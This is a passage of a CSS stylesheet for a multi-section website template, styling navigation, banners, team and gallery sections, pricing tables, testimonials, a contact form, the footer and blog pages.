  font-size:13px;
  -webkit-border-radius:50%;
  border-radius:50%;
  height:26px;
  width:26px;
  text-align: center;
  line-height:26px;
  color:#075da6;
}
#navigation.affix  ul.top-right li a {
  color: #222;
}
#navigation.affix  ul.top-right li a:hover{
	color:#075da6;
}
ul.top-right li a:hover{
	background:#075da6;
}
ul.top-right li a:hover.facebook{
	  color:#3b5998;
}
ul.top-right li a:hover.twitter{
	color:#55acee;
}
ul.top-right li a:hover.instagram{
	color:#e95950;
}

#navigation.affix ul.top-right li a:hover.facebook{
	  background:#3b5998;
}
#navigation.affix ul.top-right li a:hover.twitter{
	background:#55acee;
}
#navigation.affix ul.top-right li a:hover.instagram{
	background:#e95950;
}


/* ------------- Push Menu ------------ */
#main-navigation.noborder {
  box-shadow: 0 0;
}	
.main-button {
  height: auto;
  position: fixed;
  width:auto;
  z-index: 999;
  top: 31px;
}
.main-button.right{
	right: 15px;
}
.main-button.left{
	left: 15px;
}
.main-button.left > button.menu-active{
	left:250px;
}
.main-button > button {
  background-color:#fff;
  border:none;
  padding:5px;
  -webkit-border-radius:2px;
  -ms--border-radius:2px;
  border-radius:2px;
}
.main-button > button:hover span:first-child,
.main-button > button.menu-active span:first-child{
  transform: translateY(6px) rotate(-45deg);
}

.main-button > button:hover span:nth-child(2),
.main-button > button.menu-active span:nth-child(2){
  opacity: 0;
  transform: rotate(-45deg);
}
.main-button > button:hover span:last-child,
.main-button > button.menu-active span:last-child{
  transform: translateY(-6px) rotate(-135deg);
}
.main-button > button span {
  background: #000 none repeat scroll 0 0;
  display: block;
  height: 3px;
  pointer-events: none;
  transform-style: flat !important;
  width:20px;
}.main-button > button span:nth-child(2){
  margin: 3px 0;
}
.navbar-brand {
  display: inline-block;
}
.cbp-spmenu {
    background:#fff;
    position: fixed;
	 box-shadow:0px 0px 8px 1px rgba(0,0,0,0.176);
}
.push_nav_brand{
	margin:30px 0 30px 15px;
	display: inline-block;
	width:110px;
}
.logo-space{ padding:32px 0;}
.push_nav li{
	position:relative;
	overflow: hidden;
}
.push_nav li a{
  border-bottom: 2px solid #f5f5f5;
  color: #000;
  font-size:13px;
  font-weight:600;
  display:block;
  padding:15px;
  position:relative;
  text-transform: capitalize;
  letter-spacing:1px; 
  font-family: "raleway";
}
.push_nav li a:hover, .push_nav li.active a, .push_nav .active a:hover, .push_nav li.active a:focus{
	color:#07AAA5;
}	
/* ------------- Push Menu ------------ */



/* Index5 Navigation */
.index5 .affix-top{
	top: 0;
    z-index: 999;
    width: 100%;
	background-color: #fff;
    position: fixed;
    -webkit-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
    -moz-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
    box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
	padding:0px;
	}

.index5 .affix-top a{
	color:#000!important;
	}

.index5 .affix-top .active a{
	color:#07AAA5!important;
	}		
.index5 .affix-top .navbar-toggle .icon-bar {
    background-color: #222 !important;
}

 




/* ------------ Main Banner ------------ */
#main-slider { color:#065da6;}
.tp-banner h2{
	font-size:54px;
}
.tp-banner p{
	font-size:25px;
}
.tp-banner p , #main-slider .tp-caption a{
	color:#004177;
}
#main-slider h2.tp-caption > span{
	display:block;
}
#main-slider .tp-caption a{
	margin:5px;
}
.tp-bullets{ display:none;} 
.tp-caption{ padding:0 15px !important;}


.layer-content p{
	color:#000;
	font-weight:400;
}

.layer-content h2{
	color:#000;
	font-weight:600;
}

.layer-content h2 span{
	color:#07AAA5;
	font-weight:600;
	display:inline-block!important;
}

.layer-content h2 span.green-text{
	color:#82b440;
}









/* ------------ Main Banner ------------ */



/* ------------ Banner With Text Rotator ------------ */
.text-rotator{
	background:url("../images/banner_text.jpg");
	padding-top:150px;
	background-size:cover;
	background-attachment:fixed;
	background-position:center center;
	width:100%;
}
.text-rotator #paralax-slider{
	padding:15% 0;
}
#paralax-slider .item-content p{
	font-size:20px;
}
#paralax-slider .item-content p ,#paralax-slider .item-content h2{
		color:#fff;
}
#paralax-slider .item-content h2{
	font-size:58px;
	margin-bottom:25px;
	font-weight:100;
}

#paralax-slider .owl-controls {
  margin-top:5%;
}
#paralax-slider .owl-controls .owl-page span{
	background: #fff; 
	text-align: center;
	height:12px;
	width:12px;
	border-radius:50%;
	opacity: 1;
}
#paralax-slider .owl-controls .owl-page span:hover,
#paralax-slider .owl-controls .active span{
    background:#6BB156;
}

ul.navbar-nav ul.dropdown-menu{
	border: none;
	left: 0;
	right: auto;
}
.navbar-default .navbar-nav li ul.dropdown-menu a{
	border: none !important;
	padding: 7px 20px;
	color: #000;
	font-size: 14px;
}

/* ------------ What We Offer ------------ */
#about{}	
#about .canvas-box{
	cursor: pointer;
}
#about .canvas-box span{
	display: inline-block;
	margin-bottom:15px;
	padding:5px;
}
#about .canvas-box span i{
  display: inline-block;
  font-size:50px;
}
.color1{ color:#07AAA5;}
.color2{ color:#99D8CC;}	
.color3{ color:#EC768C;}	
.color4{ color:#C183D6;}	
.color5{ color:#31AAE1;}
.color6{ color:#82B440;}			
#about .canvas-box:hover span i,
.counters-item:hover i,
.we-do .do-wrap:hover i{
	-moz-transform:scale(1.3);
	-ms-transform:scale(1.3);
	-o-transform:scale(1.3);
	-webkit-transform:scale(1.3);
	transform:scale(1.3);
}
#about .canvas-box:hover h4.color1{
	color:#07AAA5;
}
#about .canvas-box:hover h4.color2{
	color:#99D8CC;
}
#about .canvas-box:hover h4.color3{
	color:#EC768C;
}
#about .canvas-box:hover h4.color4{
	color:#C183D6;
}
#about .canvas-box:hover h4.color5{
	color:#31AAE1;
}
#about .canvas-box:hover h4.color6{
	color:#82B440;
}	
#about .canvas-box h4{
	margin-bottom:15px;
	color:#000;
}
/* ------------ What We Offer ------------ */



/* ------------ Paralax background ------------ */
#bg-paralax {
  background:url("../images/paralax-index1.jpg") no-repeat;
  color: #fff;
  padding:10% 0;
}
#bg-paralax , #testinomial{
  background-size:cover;
  background-position:center center;
  background-attachment:fixed;
  width:100%;
}

#bg-paralax p{
	margin-bottom:25px;
	color: #fff;
}
#bg-paralax h2{
	font-size:48px;
}
/* ------------ Paralax background ------------ */



/*  ------------ Counters Fact Info  ------------ */
#facts{}
#facts .counters-item{
	padding:26% 10%;
	font-weight:bold;
	vertical-align:middle;
	color:#fff;
	cursor:pointer;
}
#facts .counters-item h2{
	font-family: "Open Sans", sans-serif;
}	

.counters-item i {
  font-size:50px;
  display: block;
  margin-bottom:15px;
}
.counters-item p{
	color:#fff;
	text-transform: capitalize;
	font-weight:bold;
}
/*  ------------ Counters Fact Info  ------------ */




/*  ------------ Responsive Secvtion With Side Image  ------------ */
#responsive .responsive-pic{}
#responsive .responsive-pic > .col-md-6 > img{ margin-top:-42px;}
#responsive .responsive-pic > .col-md-6, #responsive .responsive-pic > .col-sm-6{
	padding-left:0;
}

#responsive .r-test h3 , #responsive .r-test h4{
	color:#222222;
}

#responsive .r-test h4{
	margin-top:40px;
	margin-bottom:20px;
}

.r-test ul.r-feature li {
  color: #1b1d1f;
  display: inline-block;
  padding-left:10px;
  text-transform: capitalize;
  width: 48%;
  margin-bottom:15px;
}

.r-test ul.r-feature li:before{
  content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.r-test .screens{
	margin-top:30px;
}

.r-test .screens i{
	display:inline-block;
	margin:0 3px;
}

.r-test .screens i:first-child{
	font-size:40px;
}

.r-test .screens i:nth-child(2){ font-size:30px; }

.r-test .screens i:last-child{ font-size:25px; }
/*  ------------ Responsive Secvtion With Side Image  ------------ */




/*  ------------ experties  ------------ */
.circliful {
  position: relative;
  float:left;
  margin-left:35px;
  margin-bottom:35px;
}

.circliful:first-child{
	margin-left:0;
}

.circle-text {
  background-color:#eee;
  bottom: 0;
  color: #636363;
  display: inline-block;
  height: 45px;
  left: 50%;
  line-height: 45px !important;
  margin: -22px auto 0 -22px;
  position: absolute;
  right: 50%;
  top: 50%;
  width: 45px;
  border-radius:100%;
}

.circliful p{
  bottom: -25px;
  left: 0;
  margin-top: 25px;
  position: absolute;
  right: 0;
}

.myStat2{
	width:20%;
}

.circle-info, .circle-info-half {
	color: #999;
}

.circliful .fa {
	margin: -10px 3px 0 3px;
	position: relative;
	bottom: 4px;
}
/*  ------------ experties  ------------ */




/*  ------------ What We Do ------------ */
.we-do .do-wrap{
	background:#fff;
	-webkit-box-shadow: 0 1px 1px 0 #ddd;
	-ms-box-shadow: 0 1px 1px 0 #ddd;
	box-shadow: 0 1px 1px 0 #ddd;
}
	
.we-do .do-wrap > .top{
	width:100%;
	height:72px;
	display:block;
}
.we-do .do-wrap span{
  border-radius: 100px;
  display: inline-block;
  height: 100px;
  margin-bottom: 40px;
  margin-top: -50px;
  width: 100px;
}
.we-do .do-wrap span i{
	color: #fff;
	font-size:50px;
	line-height: 99px;
	display:block;
}
.we-do .do-wrap h4{
	margin-bottom:15px;
}		
.we-do .do-wrap p,
.white-box p{
	margin:0 15px;
}
.we-do .do-wrap a{
	margin:35px 0;
	text-decoration:none;
	position:relative;
}
.we-do .do-wrap a:before,
.thinkers .thinker-wrap ul.social-contact li a:before,
.index_2#publication .wrap-pulication a:before{
  content: "";
  height: 2px;
  left: 0;
  opacity: 0;
  filter: alpha(opacity=0);
  position: absolute;
  top:100%;
  transform: translateY(-20px);
  -ms-transition: all 0.3s linear 0.1s;
  -webkit-transition: all 0.3s linear 0.1s;
  transition: all 0.3s linear 0.1s;
  width: 100%;
	
}
.we-do .do-wrap a:hover::before, .we-do .do-wrap a:focus::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px);
	 -ms-transform:translateY(0px);
}
.we-do .do-wrap a.green-text:hover::before, .we-do .do-wrap a.green-text:focus::before{
	background:#74c8b8;
}
.we-do .do-wrap a.green-text:hover, .we-do .do-wrap a.green-text:focus{
	color:#74c8b8;
}
.we-do .do-wrap a.pink-text:hover::before, .we-do .do-wrap a.pink-text:focus::before{
	background:#ec768c;
}
.we-do .do-wrap a.pink-text:hover, .we-do .do-wrap a.pink-text:focus{
	color:#ec768c;
}
.we-do .do-wrap a.purple-text:hover::before, .we-do .do-wrap a.purple-text:focus::before{
	background:#c183d6;
}
.we-do .do-wrap a.purple-text:hover, .we-do .do-wrap a.purple-text:focus{
	color:#c183d6;
}
.we-do .do-wrap a.blue-text:hover::before, .we-do .do-wrap a.blue-text:focus::before{
	background:#31aae1;
}
.we-do .do-wrap a.blue-text:hover, .we-do .do-wrap a.blue-text:focus{
	color:#31aae1;
}
.we-do .do-wrap:hover .top, we-do .do-wrap:focus .top, .we-do .do-wrap:hover span, .we-do .do-wrap:focus span{
	background:#82b440;
	
}	

/* ------------ What We Do ------------ */




/* ------------  Our Creative Thinkers ------------  */
.thinkers .thinker-wrap img, #publication-slider .item .image img{
	width:100%;
	-moz-transition:all .2s linear;
	-ms-transition:all .2s linear;
	-o-transition:all .2s linear;
	-webkit-transition:all .2s linear;
	transition:all .2s linear;
}
.thinker-wrap p{
	margin:0 10px;
}
.thinker-image{
	width:100%;
	overflow:hidden;
	position:relative;
}
.thinker-image .overlay{
	background:rgba(7,170,165,.75);
	position:absolute;
	width:100%;
	bottom:0;
	top: auto;
	opacity:0;
	filter: alpha(opacity=0);
	left:0;
	right:0;
	cursor:pointer;
   padding:0;
	height:80px;
	-moz-transform:translateY(100%);
	-ms-transform:translateY(100%);
	-webkit-transform:translateY(100%);
	transform:translateY(100%);
}
.thinker-image .overlay.pink{
	background:rgba(236,118,140,.75);
}
.thinker-image .overlay.green{
	background:rgba(130,180,64,.75);
}	
.thinker-image:hover .overlay{
	opacity:1;
	filter: alpha(opacity=100);
	-moz-transform: translateY(0%);
	-ms-transform: translateY(0%);
	-webkit-transform: translateY(0%);
	transform: translateY(0%);
}

.thinker-image .overlay ul.social-link li a{
	border: 1px solid #fff;
}
.thinker-image .overlay ul.social-link li a > i{
	color: #fff;
}
.thinker-image .overlay ul.social-link li a:hover > i{
	color: #121416;
}
.thinker-image .overlay ul.social-link li a:hover span{
	background: #fff;
	border:1px solid #fff;
}
.thinker-wrap:hover .thinker-image img,  #publication-slider .item:hover .image img
{
	transform:scale(1.05);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}
.thinkers .thinker-wrap h3{  
	margin-top:20px;
	font-size:20px;
}
.thinkers .thinker-wrap small{
  color: #838383;
  display: inline-block;
  margin: 5px 0 15px;
}

.thinkers .thinker-wrap ul.social-contact li{
	display:inline-block;
}

.thinkers .thinker-wrap ul.social-contact li a{
	font-weight:bolder;
	color:#222222;
	margin:0 8px;
	text-transform:uppercase;
	position:relative;
	padding-bottom:3px;
}
.thinkers .thinker-wrap ul.social-contact li a:hover::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px)
	
}
.thinkers .thinker-wrap ul.social-contact li a:hover.facebook{
	color:#3b5998 !important;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.facebook::before{
	background: #3b5998;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter{
	color:#1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter::before{
	background: #1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden{
	color:#0077B5;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden::before{
	background: #0077B5;
}
/* ------------  Our Creative Thinkers ------------  */




/* ------------  Gallery Filter ------------  */
#project{
	padding-top:5%;
	background:#f8f8f8;
}
.work-filter {
	margin-bottom:50px;
}

.work-filter ul li {
    display: inline-block;
}

.work-filter ul li a {
  color: #222222;
  display: block;
  font-size:15px;
  padding:6px 10px;
  text-transform: capitalize;
  border-bottom:1px solid #909090;
  border-top:1px solid #909090;
  border-left:1px solid transparent;
  border-right:1px solid transparent;
  cursor: pointer;
}
.work-filter ul li a:hover,
.work-filter ul li a.active:hover{
  background-color:#07AAA5;
  border:1px solid #07AAA5;
  color: #fff;
}
.work-filter ul li a.active {
  background-color: #82b440;
  border:1px solid #82b440;
  color: #fff;
}

.mix {
    display: none;
}

.index_2 .work-item {
    width:20%;
}

.work-item {
	height:auto;
	width:auto;
	float:left;
   position: relative;
	overflow:hidden;
}

.work-item > img {
  display: block;
  height: auto;
  max-width: 100%;
  width:100%;
}
.item-containe > img{
  -webkit-transition: all 0.7s ease 0s;
   -moz-transition:all 0.7s ease 0s;
	-ms-transition:all 0.7s ease 0s;
   -o-transition:all 0.7s ease 0s;
	transition:all 0.7s ease 0s;
}
.item-container:hover  img{
	transform:scale(1.2);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}

.overlay {
	background-color:rgba(255,255,255,.8);
	position: absolute;
	left:10px;
	top:10px;
	bottom:10px;
	right:10px;
	width:auto;
	height:inherit;
	color: #222222;
	opacity: 0;
	filter: alpha(opacity=0);
	padding:2%;
	z-index:1;
}

.overlay-inner{
  margin: auto;
  position: absolute;
  top: 50%;
  -moz-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  -webkit-transform: translateY(-50%);
  transform: translateY(-50%);
  width: 100%;
}

.item-container:hover .overlay {
	opacity: 1;
	filter: alpha(opacity=100);
}
.work-item:hover .line{
	width:40%;
}
.overlay h4.color{ color:#07AAA5;}
.overlay h4.base{ color:#82A75E;}

.work-item .overlay p{
	font-size:14px;
}
.overlay .line{
	width:0%;
}
.overlay .line ,
.product-content .line{
	height:1px;
	margin:15px auto;
	background-color:#000;
	-webkit-transition: all 500ms ease-out;
	-moz-transition: all 500ms ease-out;
	-o-transition: all 500ms ease-out;
	transition: all 500ms ease-out;					 
}
/* ------------  Gallery Filter ------------  */




/* ---------- Pricing Tables ---------- */
.pricing {
	display: -webkit-flex;
	display: flex;
	-webkit-flex-wrap: wrap;
	flex-wrap: wrap;
	-webkit-justify-content: center;
	justify-content: center;
	width: 100%;
	margin: 0 auto;
}

.pricing_item {
	position: relative;
	display: -webkit-flex;
	display: flex;
	-webkit-flex-direction: column;
	flex-direction: column;
	-webkit-align-items: stretch;
	align-items: stretch;
	text-align: center;
	-webkit-flex: 0 1 330px;
	flex: 0 1 330px;
}
.pricing_list {
	text-align: left;
}
.pricing_tenzin .pricing_item {
	margin: 1em;
	padding: 2em 1em;
	text-align: left;
	color: #262b38;
	background: #EEF0F3;
	border-top: 3px solid;
	-webkit-transition: border-color 0.3s;
	transition: border-color 0.3s;
	margin-top:0;
}
.pricing_tenzin .pricing_item.pink{
	border-color:#EC768C;
}	
.pricing_tenzin .pricing_item.blue{
	border-color:#07AAA5;
}
.pricing_tenzin .pricing_item.pink .pricing_action{
	background:#EC768C;
}
.pricing_tenzin .pricing_item.blue .pricing_action{
	background:#07AAA5;
}
.pricing_tenzin .pricing_item.active{
	border-color: #82B440;
}
/*.pricing_tenzin .pricing_item.active:hover{
	border-color: #07AAA5;
} */
.pricing_tenzin .pricing_title {
	font-size: 1em;
	margin: 0 0 1em;
}
.pricing_item:hover .pricing_action{
	border:1px solid transparent;
	background:#82b440 !important;
}
.pricing_tenzin .pricing_price {
	font-size: 2em;
	padding: 0.5em 0 0.75em;
	border-top: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_currency {
	font-size: 0.5em;
	vertical-align: super;
}

.pricing_tenzin .pricing_sentence {
	font-weight: bold;
	padding: 0 0 0.5em;
	color: #9CA0A9;
	border-bottom: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_list {
	font-size:14px;
	padding:25px 0;	
	color: #8b909d;
}
.pricing_tenzin .pricing_list li{
	margin-bottom:8px;
}
.pricing_tenzin .pricing_list li:before{
	content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.pricing_tenzin .pricing_action {
	font-weight: bold;
	margin-top: auto;
	padding: 1em 2em;
	color: #fff;	
	-webkit-transition: background-color 0.3s ease-in-out;
	transition: background-color 0.3s ease-in-out;
	border:1px solid transparent;

 }
.pricing_item.active .pricing_action{
	border:1px solid transparent;
	background:#82b440;
}
.pricing_item.active:hover .pricing_action{
	border:1px solid transparent;
	background:#07AAA5 !important;
}	
/* ---------- Pricing Tables ---------- */



/* ------------ Testinomials ------------ */
#testinomial{
	background:url(../images/bg-testinomial.jpg) no-repeat;
	color:#fff;
}
#testinomial h2{ color:#82B440; }
#testinomial p{ color:#fff; }
#testinomial-slider .item{
  display: block;
  width: 100%;
  height: auto;
  color:#fff;
}

#testinomial-slider .item p {
  font-size: 20px;
  margin-left: 13%;
  margin-right: 13%;
}

#testinomial-slider .item h5{ 
	font-size:14px; 
	text-transform:uppercase; 
	margin-top:40px; 
	margin-bottom:15px;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next{
	border:1px solid #fff;
	color:#FFF;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next ,
#publication-slider .owl-prev ,
#publication-slider .owl-next {
	top:40%;
	position:absolute;
	background:transparent;
	height:38px;
	width:38px;
	-ms-border-radius:38px;
	-webkit-border-radius:38px;
	border-radius:38px;
	font-size:30px;
	line-height:20px;
	opacity:1;
	filter: alpha(opacity=100);
}

#testinomial-slider .owl-prev:hover,
#testinomial-slider .owl-next:hover ,
#publication-slider .owl-prev:hover ,
#publication-slider .owl-next:hover{
	border:1px solid #82b440;
	background-color:#82b440;
	color:#fff;
	-webkit-transition: background 0.3s linear 0.1s;
	-ms-transition: background 0.3s linear 0.1s;
	transition: background 0.3s linear 0.1s;
}
#testinomial-slider .owl-prev{
	left:0;
}
#testinomial-slider .owl-next{
	right:0;
}
/* ------------ Testinomials ------------ */



/* ------------  Publications ------------ */
#publication{}
#publication-slider .item{
  margin:0 15px;
}
#publication-slider .item:hover{
	cursor:pointer;
}	
#publication-slider .item .image{
	overflow: hidden;
  position: relative;
  width: 100%;
}

#publication-slider .item > img{
  display: block;
  width: 100%;
  height: auto;
}
#publication-slider .item h5{
	font-size:12px;
	color:#727272;
	margin-top:25px;
}
#publication-slider .item h5 , #publication-slider .item h4{
	margin-bottom:10px;
}
#publication-slider .item h4{
	font-size:20px;
	color:#222222;
}
#publication-slider .item  a.name{
	color:#222222;
}

#publication-slider .item  a.name ,
#publication-slider .item  a.comment{
	font-size:15px !important;
	margin-bottom:10px;
	display:inline-block;
	text-transform:none;
}
#publication-slider .item  a.comment{
	color:#82b440;
}
#publication-slider .item  a.comment:before{
	content:'';
	background:transparent;
}
#publication-slider .item p > a{
	font-size:15px;
}
#publication-slider .item > a{
	color:#000;
	position:relative;
	font-size:13px;
	font-weight:bold;
	text-transform: uppercase;
}
#publication-slider .item > a:hover{
	color:#82b440;
}
#publication-slider .owl-prev ,
#publication-slider .owl-next{
	border:1px solid #7a7a7a;
	color:#7a7a7a;
}
#publication-slider .owl-prev{
	left:-5%;
}

#publication-slider .owl-next{
	right:-5%;
}
/* ------------  Publications ------------ */



/* ------------ Slogan Text with Button ------------ */
#slogan{
	background:#82b440;
	padding:25px 0;
	color:#fff;
	margin-top:-2px;
	width:100%;
}
#slogan a{
  padding: 15px 35px;
  border:1px solid #fff;
  color:#000;
  background:#fff;
  font-weight:bold;
  text-transform: capitalize;
}

#slogan p {
  color: #fff;
  font-size: 20px;
  margin: 10px 0;
}
/* ------------ Slogan Text with Button ------------ */



/* ------------ Contact Us ------------ */
#contact .center h2,
#contact .center .margen{
	margin-bottom:45px;
}
#contact .center a{
	color:#82b440;
}

#contact .center ul.social-link{
	margin-top:45px;
}


#contact .form-inline{
	margin-top:45px;
}
.form-control:focus {
  border-color: #82b440 !important;
  box-shadow:none;
  transition: all 0.2s ease-in 0s;
}

#contact .form-inline .col-md-6,
#contact .form-inline .col-md-12{
	padding-left:5px;
	padding-right:5px;
}


#contact .form-inline .form-control, #contact .form-inline textarea {
  border: 1px solid #d0d0d0;
  border-radius: 0;
  color: #4c4c4c;
  font-size: 14px;
  padding: 15px;
  width: 100%;
}

#contact .form-inline .form-control{
	height:45px;
}

#contact .form-inline .form-control,
#contact .form-inline textarea{
	margin-bottom:10px;
}

#contact .form-inline textarea{
	margin-top:0;
	min-height:210px;
}
#contact .form-inline .btn-black{
	width:100%;
	color:#fff;
	
}	
#contact .form-inline input[type="submit"]{
	width:100%;
	height:100%;
	background-color:transparent;
}
/* ------------ Contact Us ------------ */




/* ---------- Footer  ---------- */
footer{
	background:#121416;
	padding:35px 0;
	position:relative;
}
footer p{
	margin:0;
	color:#a6a6a6;
	font-size:14px;
}
footer .breadcrumb{
	background-color:transparent;
	padding:0;
}

footer .breadcrumb li a {
  text-shadow: none;
  color:#fff;
	font-size:14px;
	position:relative;
}
footer .breadcrumb li a:hover, footer .breadcrumb li a:focus{
  color: #82b440;
}

.go-top {
  bottom:20px;
  position: fixed;
  font-size:20px;
  right:25px;
  z-index:800;
  background:#82b440;
  color:#fff;
  border-radius:5px;
  height:40px;
  width:40px;
  text-align:center;
  line-height:40px;
  opacity:0;
}
.go-top:hover, .go-top:focus{
	background:#07AAA5;
	color:#fff;
}
.go-top.show {
    opacity: 1;
}
/* ---------- Footer  ---------- */





 ul.social-link li a{
	display: inline-block;
	margin: 0 2px;
}

 ul.social-link li{
	margin-top:10px;
	display:inline-block;
}

 ul.social-link li a {
  border: 1px solid #000;
  border-radius: 44px;
  font-size: 20px;
  height: 44px;
  width: 44px;
  position:relative;
  color: #000 !important;
}

 ul.social-link li a span{
	border-radius: 0;
	display: block;
	height: 0;
	left: 50%;
	margin: 0;
	position: absolute;
	top: 50%;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	-o-transition: all 0.3s;
	transition: all 0.3s;
	width: 0;
}

 ul.social-link li a:hover span {
  background: #82b440;
  border-radius:44px;
  height:44px;
  width:44px;
  border: 1px solid #82b440;
  height:44px;
  top: -1px;
  left: -1px;
  right: 0;
  bottom: 0;
}
 ul.social-link li a i {
  height: 100%;
  left: 0;
  line-height: 42px;
  position: absolute;
  top: 0;
  transition: all 0.3s ease 0s;
  width: 100%;
  z-index: 10;
}

 ul.social-link li a :hover,  ul.social-link li a:focus{
	color:#fff;
	 border: none;
}



/* ========================= Alert Classes ==================== */ 

.alert-success {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
	}
	
.alert-danger {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
}	






 



/*=========================================*/
          /* Blog WIth All Versions*/
/*=========================================*/
#area-main{}
.blog-wrap{
	background-color:#fff;
	width:100%;
	position:relative;
	overflow:hidden;
}

.blog-wrap .blog-content {
  display: table-cell;
  padding:6.5em 0;
}

.blog-content-bg {
  background-color: #fff;
  margin: 0 auto;
  padding:30px 30px 5px;
  position: relative;
  top: -60px;
  width: 95%;
}

.blog-item-v3.catItemView{
	border-bottom: 1px solid #d1d2d2;
	padding-bottom:70px;
	margin-bottom:70px;
}

.blog-item-v3 > img{
	margin-bottom:35px;
}

.blog-item-v3 .blog-content {
	padding:0;
}

.no-margin{ margin:0; border:none;}
#area-main h3{
	color:#1b1d1f;
}

#area-main p{
	color:#1b1d1f;
}

#area-main a.readmore{
	color:#fff;
	padding:10px 35px;
	background:#1b1d1f;
	border:1px solid transparent;
	display:inline-block;
	text-decoration:none;
	margin-top:20px;
}

#area-main a.readmore:hover, #area-main a.readmore:focus{
	border:1px solid #82b440;
}

#area-main ul.blog-author{
	margin:20px 0 25px;
}

#area-main ul.blog-author li{
	display:inline-block;
}

#area-main ul.blog-author li a{
	color:#696969;
	font-size:14px;
	margin-right:15px;
}

#area-main ul.blog-author li a .fa{
	margin-right:5px;
}

#area-main ul.blog-author li a:hover, #area-main ul.blog-author li a:focus{
	color:#82b440;
}

.morepost-wrap{
	margin-top:75px;
	border-top:1px solid #d1d2d2;
}

.morepost-wrap2{
	border-top:1px solid #d1d2d2;
	border-bottom:1px solid #d1d2d2;
	padding-bottom:25px;
}

.morepost-wrap a:hover ,
.morepost-wrap2 a:hover{
	color:#82b440;
}

.morepost-wrap .morepost ,
.morepost-wrap2 .morepost{ 
  font-size:16px;
  color:#696969;
  margin-top:25px;
  display:inline-block;
  position: relative;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap .morepost .fa-long-arrow-left{
	right:0;
}

.morepost-wrap2 .morepost:hover .fa-long-arrow-left,
.morepost-wrap .morepost:hover .fa-long-arrow-left{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	right:100%;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-left , 
.morepost-wrap .morepost .fa-long-arrow-right{
	color: transparent;
	pointer-events: none;
   position: absolute;
   text-shadow: 0 0 transparent;
   top:25%;
   transform: translateX(-50%);
   transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
  -webkit-transition: all 0.3s ease 0s;
	-ms-transition: all 0.3s ease 0s;
	transition: all 0.3s ease 0s;
	opacity:0 !important;
	filter: alpha(opacity=0);
}

.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-right{
  left:0%;
  margin-left:5px;
}

.morepost-wrap2 .morepost:hover  .fa-long-arrow-right,
.morepost-wrap .morepost:hover .fa-long-arrow-right{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	left:110%;
}

.blog-content-pic{}
.blog-content-pic img{ width:100%;}
.blog-item .blog-content{
	padding:0;
	margin:35px 0;
}

.blog-item .blog-content p{
	margin-bottom:25px;
}

.blog-item blockquote{
	color:#82b440;
}

.blog-item .post-tag{
	border:1px solid #d9d9d9;
	padding:5px;
	margin-bottom:70px;
}

#area-main .tag-cloud li {
  display: inline-block;
  margin: 6px;
}

#area-main .tag-cloud li a{
	 display:block;
}

#area-main .tag-cloud li a , .blog-reply a.btn-rep{
    background:#efefef;
    color: #1b1d1f;
	 font-size:12px;
    padding: 8px 15px;
	 text-transform:uppercase;
}
#area-main .tag-cloud li a:hover , #area-main .tag-cloud li a:focus ,
.blog-reply a.btn-rep:hover,.blog-reply a.btn-rep:focus{
    background:#82b440;
    color: #fff;
	 -webkit-transition: all 500ms linear;
   -moz-transition: all 500ms linear;
	-ms-transition: all 500ms linear;
   -o-transition:all 500ms linear;
	transition:all 500ms linear;
}

.blog-item ul.social-link li{ margin:0; }
.blog-item ul.social-link li a > i{
	color: #1b1d1f;
}
.blog-item ul.social-link li a > i:hover{
	color: #fff;
}
.blog-reply{
	padding:10px;
	border:1px solid #f3f3f3;
	position:relative;
	margin:20px 0;
}
.blog-reply h4{
	color:#1b1d1f;
	margin-bottom:8px;
	text-transform:capitalize;
}
.blog-reply a.btn-rep{
	position:absolute;
	top:0;
	right:0;
}

.blog-item .post-comment h3{
	margin-bottom:35px;
	margin-top:70px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control{
	height:50px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control,
.blog-item .post-comment form textarea,
.contact form textarea,
.index_3 .form-inline .form-control,
.index_3 .form-inline textarea{
  padding:15px;
  font-size:14px;
  color:#4c4c4c;
  border:1px solid #d0d0d0;
  width:100%;
  border-radius:0;
}

.blog-item .post-comment form textarea, 
.contact form textarea{
	margin:30px 0;
	min-height:210px;
}

.blog-item .post-comment form input[type="submit"] , 
.contact form input[type="submit"]{
	background:#82b440;
	border:1px solid transparent;
	font-weight:bold;
	color:#fff;
	height:50px;
	width:185px;
	position:relative;
}
